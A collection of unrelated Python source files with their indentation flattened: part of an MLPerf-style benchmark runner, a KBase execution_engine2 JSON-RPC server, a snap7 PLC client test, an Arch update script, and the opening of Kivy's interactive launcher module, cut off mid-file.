query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.tasks.put(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
ie = i + bs
data, label = self.ds.get_samples(idx[i:ie])
self.tasks.put(Item(query_id[i:ie], idx[i:ie], data, label))
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": len(result_list),
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "mAP" in result_dict:
result["mAP"] = 100. * result_dict["mAP"]
acc_str += ", mAP={:.3f}%".format(result["mAP"])
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str,
len(result_list), buckets_str))
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend)
# override image format if given
image_format = args.data_format if args.data_format else backend.image_format()
# --count applies to accuracy mode only and can be used to limit the number of images
# for testing. For perf model we always limit count to 200.
count_override = False
count = args.count
if count:
count_override = True
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
ds = wanted_dataset(data_path=args.dataset_path,
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=pre_proc,
use_cache=args.cache,
count=count, **kwargs)
# load model to backend
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
mlperf_conf = os.path.abspath(args.mlperf_conf)
if not os.path.exists(mlperf_conf):
log.error("{} not found".format(mlperf_conf))
sys.exit(1)
user_conf = os.path.abspath(args.user_conf)
if not os.path.exists(user_conf):
log.error("{} not found".format(user_conf))
sys.exit(1)
if args.output:
output_dir = os.path.abspath(args.output)
os.makedirs(output_dir, exist_ok=True)
os.chdir(output_dir)
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
ds.load_query_samples([0])
for _ in range(5):
img, _ = ds.get_samples([0])
_ = backend.predict({backend.inputs[0]: img})
ds.unload_query_samples(None)
scenario = SCENARIO_MAP[args.scenario]
runner_map = {
lg.TestScenario.SingleStream: RunnerBase,
lg.TestScenario.MultiStream: QueueRunner,
lg.TestScenario.Server: QueueRunner,
lg.TestScenario.Offline: QueueRunner
}
runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, max_batchsize=args.max_batchsize)
def issue_queries(query_samples):
runner.enqueue(query_samples)
def flush_queries():
pass
def process_latencies(latencies_ns):
# called by loadgen to show us the recorded latencies
global last_timeing
last_timeing = [t / NANO_SEC for t in latencies_ns]
settings = lg.TestSettings()
settings.FromConfig(mlperf_conf, args.model_name, args.scenario)
settings.FromConfig(user_conf, args.model_name, args.scenario)
settings.scenario = scenario
settings.mode = lg.TestMode.PerformanceOnly
if args.accuracy:
settings.mode = lg.TestMode.AccuracyOnly
if args.find_peak_performance:
settings.mode = lg.TestMode.FindPeakPerformance
if args.time:
# override the time we want to run
settings.min_duration_ms = args.time * MILLI_SEC
settings.max_duration_ms = args.time * MILLI_SEC
if args.qps:
qps = float(args.qps)
settings.server_target_qps = qps
settings.offline_expected_qps = qps
if count_override:
settings.min_query_count = count
settings.max_query_count = count
if args.samples_per_query:
settings.multi_stream_samples_per_query = args.samples_per_query
if args.max_latency:
settings.server_target_latency_ns = int(args.max_latency * NANO_SEC)
settings.multi_stream_expected_latency_ns = int(args.max_latency * NANO_SEC)
sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
qsl = lg.ConstructQSL(count, min(count, 500), ds.load_query_samples, ds.unload_query_samples)
log.info("starting {}".format(scenario))
result_dict = {"good": 0, "total": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
lg.StartTest(sut, qsl, settings)
if not last_timeing:
last_timeing = runner.result_timing
if args.accuracy:
post_proc.finalize(result_dict, ds, output_dir=args.output)
add_results(final_results, "{}".format(scenario),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
#
# write final results
#
if args.output:
with open("results.json", "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
execution_engine2Server.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from execution_engine2.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'execution_engine2'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from execution_engine2.execution_engine2Impl import execution_engine2 # noqa @IgnorePep8
impl_execution_engine2 = execution_engine2(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'execution_engine2'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_execution_engine2.list_config,
name='execution_engine2.list_config',
types=[])
self.method_authentication['execution_engine2.list_config'] = 'optional' # noqa
self.rpc_service.add(impl_execution_engine2.ver,
name='execution_engine2.ver',
types=[])
self.method_authentication['execution_engine2.ver'] = 'none' # noqa
self.rpc_service.add(impl_execution_engine2.status,
name='execution_engine2.status',
types=[])
self.method_authentication['execution_engine2.status'] = 'none' # noqa
self.rpc_service.add(impl_execution_engine2.run_job,
name='execution_engine2.run_job',
types=[dict])
self.method_authentication['execution_engine2.run_job'] = 'required' # noqa
self.rpc_service.add(impl_execution_engine2.get_job_params,
name='execution_engine2.get_job_params',
types=[str])
self.method_authentication['execution_engine2.get_job_params'] = 'required' # noqa
self.rpc_service.add(impl_execution_engine2.update_job_status,
name='execution_engine2.update_job_status',
types=[dict])
self.method_authentication['execution_engine2.update_job_status'] = 'required' # noqa
self.rpc_service.add(impl_execution_engine2.add_job_logs,
name='execution_engine2.add_job_logs',
types=[str, list])
self.method_authentication['execution_engine2.add_job_logs'] = 'required' # noqa
self.rpc_service.add(impl_execution_engine2.get_job_logs,
name='execution_engine2.get_job_logs',
types=[dict])
self.method_authentication['execution_engine2.get_job_logs'] = 'required' # noqa
self.rpc_service.add(impl_execution_engine2.finish_job,
name='execution_engine2.finish_job',
types=[dict])
self.method_authentication['execution_engine2.finish_job'] = 'required' # noqa
self.rpc_service.add(impl_execution_engine2.start_job,
name='execution_engine2.start_job',
types=[dict])
self.method_authentication['execution_engine2.start_job'] = 'required' # noqa
self.rpc_service.add(impl_execution_engine2.check_job,
name='execution_engine2.check_job',
types=[dict])
self.method_authentication['execution_engine2.check_job'] = 'required' # noqa
self.rpc_service.add(impl_execution_engine2.check_jobs,
name='execution_engine2.check_jobs',
types=[dict])
self.method_authentication['execution_engine2.check_jobs'] = 'required' # noqa
self.rpc_service.add(impl_execution_engine2.check_workspace_jobs,
name='execution_engine2.check_workspace_jobs',
types=[dict])
self.method_authentication['execution_engine2.check_workspace_jobs'] = 'required' # noqa
self.rpc_service.add(impl_execution_engine2.cancel_job,
name='execution_engine2.cancel_job',
types=[dict])
self.method_authentication['execution_engine2.cancel_job'] = 'required' # noqa
self.rpc_service.add(impl_execution_engine2.check_job_canceled,
name='execution_engine2.check_job_canceled',
types=[dict])
self.method_authentication['execution_engine2.check_job_canceled'] = 'required' # noqa
self.rpc_service.add(impl_execution_engine2.get_job_status,
name='execution_engine2.get_job_status',
types=[str])
self.method_authentication['execution_engine2.get_job_status'] = 'required' # noqa
self.rpc_service.add(impl_execution_engine2.check_jobs_date_range_for_user,
name='execution_engine2.check_jobs_date_range_for_user',
types=[dict])
self.method_authentication['execution_engine2.check_jobs_date_range_for_user'] = 'required' # noqa
self.rpc_service.add(impl_execution_engine2.check_jobs_date_range_for_all,
name='execution_engine2.check_jobs_date_range_for_all',
types=[dict])
self.method_authentication['execution_engine2.check_jobs_date_range_for_all'] = 'required' # noqa
self.rpc_service.add(impl_execution_engine2.is_admin,
name='execution_engine2.is_admin',
types=[dict])
self.method_authentication['execution_engine2.is_admin'] = 'required' # noqa
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'execution_engine2 ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_logo_client.py | import logging
import time
import unittest
from multiprocessing import Process
import snap7
from snap7.server import mainloop
logging.basicConfig(level=logging.WARNING)
ip = '127.0.0.1'
tcpport = 1102
db_number = 1
rack = 0x1000
slot = 0x2000
class TestLogoClient(unittest.TestCase):
process = None
@classmethod
def setUpClass(cls):
cls.process = Process(target=mainloop)
cls.process.start()
time.sleep(2) # wait for server to start
@classmethod
def tearDownClass(cls):
cls.process.terminate()
def setUp(self):
self.client = snap7.logo.Logo()
self.client.connect(ip, rack, slot, tcpport)
def tearDown(self):
self.client.disconnect()
self.client.destroy()
def test_read(self):
vm_address = "V40"
value = 50
self.client.write(vm_address, value)
result = self.client.read(vm_address)
self.assertEqual(value, result)
def test_write(self):
vm_address = "V20"
value = 8
self.client.write(vm_address, value)
def test_get_connected(self):
self.client.get_connected()
def test_set_param(self):
values = (
(snap7.types.PingTimeout, 800),
(snap7.types.SendTimeout, 15),
(snap7.types.RecvTimeout, 3500),
(snap7.types.SrcRef, 128),
(snap7.types.DstRef, 128),
(snap7.types.SrcTSap, 128),
(snap7.types.PDURequest, 470),
)
for param, value in values:
self.client.set_param(param, value)
self.assertRaises(Exception, self.client.set_param,
snap7.types.RemotePort, 1)
def test_get_param(self):
expected = (
(snap7.types.RemotePort, tcpport),
(snap7.types.PingTimeout, 750),
(snap7.types.SendTimeout, 10),
(snap7.types.RecvTimeout, 3000),
(snap7.types.SrcRef, 256),
(snap7.types.DstRef, 0),
(snap7.types.SrcTSap, 4096),
(snap7.types.PDURequest, 480),
)
for param, value in expected:
self.assertEqual(self.client.get_param(param), value)
non_client = (snap7.types.LocalPort, snap7.types.WorkInterval, snap7.types.MaxClients,
snap7.types.BSendTimeout, snap7.types.BRecvTimeout, snap7.types.RecoveryTime,
snap7.types.KeepAliveTime)
# invalid param for client
for param in non_client:
self.assertRaises(Exception, self.client.get_param, non_client)
class TestClientBeforeConnect(unittest.TestCase):
"""
Test suite of items that should run without an open connection.
"""
def setUp(self):
self.client = snap7.client.Client()
def test_set_param(self):
values = (
(snap7.types.RemotePort, 1102),
(snap7.types.PingTimeout, 800),
(snap7.types.SendTimeout, 15),
(snap7.types.RecvTimeout, 3500),
(snap7.types.SrcRef, 128),
(snap7.types.DstRef, 128),
(snap7.types.SrcTSap, 128),
(snap7.types.PDURequest, 470),
)
for param, value in values:
self.client.set_param(param, value)
if __name__ == '__main__':
unittest.main()
|
update.py | #!/usr/bin/python3
import subprocess
import threading
import time
# import sys
before_yaourt = [
['backup.sh'],
['update_tools_helper', 'pkgfile'],
['update_tools_helper', 'abs'],
]
popens_to_wait_on = []
yaourt = [
['update_tools_helper', 'alpm'],
['yaourt', '-Sua'],
]
after_yaourt = [
['update_tools_helper', 'mlocate'],
['update_tools_helper', 'man'],
['update_tools_helper', 'units'],
]
def print_stdout(aPopen):
while aPopen.returncode is None:
out, err = aPopen.communicate()
print(out.decode('utf-8'))
aPopen.poll()
time.sleep(12)
for i in before_yaourt:
popens_to_wait_on.append(subprocess.Popen(i, stdout=subprocess.PIPE,
stderr=subprocess.PIPE))
for i in yaourt:
subprocess.call(i)
for i in after_yaourt:
popens_to_wait_on.append(subprocess.Popen(i, stdout=subprocess.PIPE))
for i in popens_to_wait_on:
var = threading.Thread(target=print_stdout, args=[i])
var.start()
|
interactive.py | '''
Interactive launcher
====================
.. versionadded:: 1.3.0
.. versionchanged:: 1.9.2
The interactive launcher has been deprecated.
The :class:`InteractiveLauncher` provides a user-friendly python shell
interface to an :class:`App` so that it can be prototyped and debugged
interactively.
.. note::
The Kivy API intends for some functions to only be run once or before the
main EventLoop has started. Methods that can normally be called during the
course of an application will work as intended, but specifically overriding
methods such as :meth:`on_touch` dynamically leads to trouble.
Creating an InteractiveLauncher
-------------------------------
Take your existing subclass of :class:`App` (this can be production code) and
pass an instance to the :class:`InteractiveLauncher` constructor. ::
from kivy.interactive import InteractiveLauncher
from kivy.app import App
from kivy.uix.button import Button
class MyApp(App):
def build(self):
return Button(text='Hello Shell')
launcher = InteractiveLauncher(MyApp())
launcher.run()
After pressing *enter*, the script will return. This allows the interpreter to
continue running. Inspection or modification of the :class:`App` can be done
safely through the InteractiveLauncher instance or the provided
:class:`SafeMembrane` class instances.
.. note::
If you want to test this example, start Python without any file to have
already an interpreter, and copy/paste all the lines. You'll still have the
interpreter at the end + the kivy application running.
Interactive Development
-----------------------
IPython provides a fast way to learn the Kivy API. The :class:`App` instance
and all of it's attributes, including methods and the entire widget tree,
can be quickly listed by using the '.' operator and pressing 'tab'. Try this
code in an Ipython shell. ::
from kivy.interactive import InteractiveLauncher
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.graphics import Color, Ellipse
class MyPaintWidget(Widget):
def on_touch_down(self, touch):
with self.canvas:
Color(1, 1, 0)
d = 30.
Ellipse(pos=(touch.x - d/2, touch.y - d/2), size=(d, d))
class TestApp(App):
def build(self):
return Widget()
i = InteractiveLauncher(TestApp())
i.run()
i. # press 'tab' to list attributes of the app
i.root. # press 'tab' to list attributes of the root widget
# App is boring. Attach a new widget!
i.root.add_widget(MyPaintWidget())
i.safeIn()
# The application is now blocked.
# Click on the screen several times.
i.safeOut()
# The clicks will show up now
# Erase artwork and start over
i.root.canvas.clear()
.. note::
All of the proxies used in the module store their referent in the
:attr:`_ref` attribute, which can be accessed directly if needed, such as
for getting doc strings. :func:`help` and :func:`type` will access the
proxy, not its referent.
Directly Pausing the Application
--------------------------------
Both the :class:`InteractiveLauncher` and :class:`SafeMembrane` hold internal
references to the :class:`EventLoop`'s 'safe' and 'confirmed'
:class:`threading.Event` objects. You can use their safing methods to control
the application manually.
:meth:`SafeMembrane.safeIn` will cause the application to pause and
:meth:`SafeMembrane.safeOut` will allow a paused application
to continue running. This is potentially useful for scripting actions into
functions that need the screen to update etc.
.. note::
The pausing is implemented via the
:class:`Clocks' <kivy.clock.Clock>`
:meth:`~kivy.clock.ClockBase.schedule_once` method
and occurs before the start of each frame.
Adding Attributes Dynamically
-----------------------------
.. note::
This module uses threading and object proxies to encapsulate the running
:class:`App`. Deadlocks and memory corruption can occur if making direct
references inside the thread without going through the provided proxy(s).
The :class:`InteractiveLauncher` can have attributes added to it exactly like a
normal object and if these were created from outside the membrane, they will
not be threadsafe because the external references to them in the python
interpreter do not go through InteractiveLauncher's membrane behavior,
inherited from :class:`SafeMembrane`.
To threadsafe these external references, simply assign them to
:class:`SafeMembrane` instances of themselves like so::
from kivy.interactive import SafeMembrane
interactiveLauncher.attribute = myNewObject
# myNewObject is unsafe
myNewObject = SafeMembrane(myNewObject)
# myNewObject is now safe. Call at will.
myNewObject.method()
TODO
====
Unit tests, examples, and a better explanation of which methods are safe in a
running application would be nice. All three would be excellent.
Could be re-written with a context-manager style i.e. ::
with safe:
foo()
Any use cases besides compacting code?
'''
__all__ = ('SafeMembrane', 'InteractiveLauncher')
import inspect
from threading import Thread, Event
from kivy.app import App
from kivy.base import EventLoop
from kivy.clock import Clock
from kivy.utils import deprecated
def safeWait(dt):
EventLoop.confirmed.set()
EventLoop.safe.wait()
EventLoop.confirmed.clear()
def unwrap(ob):
while type(ob) == SafeMembrane:
ob = ob._ref
return ob
class SafeMembrane(object):
'''
This help is for a proxy object. Did you want help on the proxy's referent
instead? Try using help(<instance>._ref)
The SafeMembrane is a threadsafe proxy that also returns attributes as new
thread-safe objects
and makes thread-safe method calls, preventing thread-unsafe objects
from leaking into the user's environment.
'''
__slots__ = ('_ref', 'safe', 'confirmed')
def __init__(self, ob, *args, **kwargs):
self.confirmed = EventLoop.confirmed
self.safe = EventLoop.safe
self._ref = ob
def safeIn(self):
"""Provides a thread-safe entry point for interactive launching."""
self.safe.clear()
Clock.schedule_once(safeWait, -1)
self.confirmed.wait()
def safeOut(self):
"""Provides a thread-safe exit point for interactive launching."""
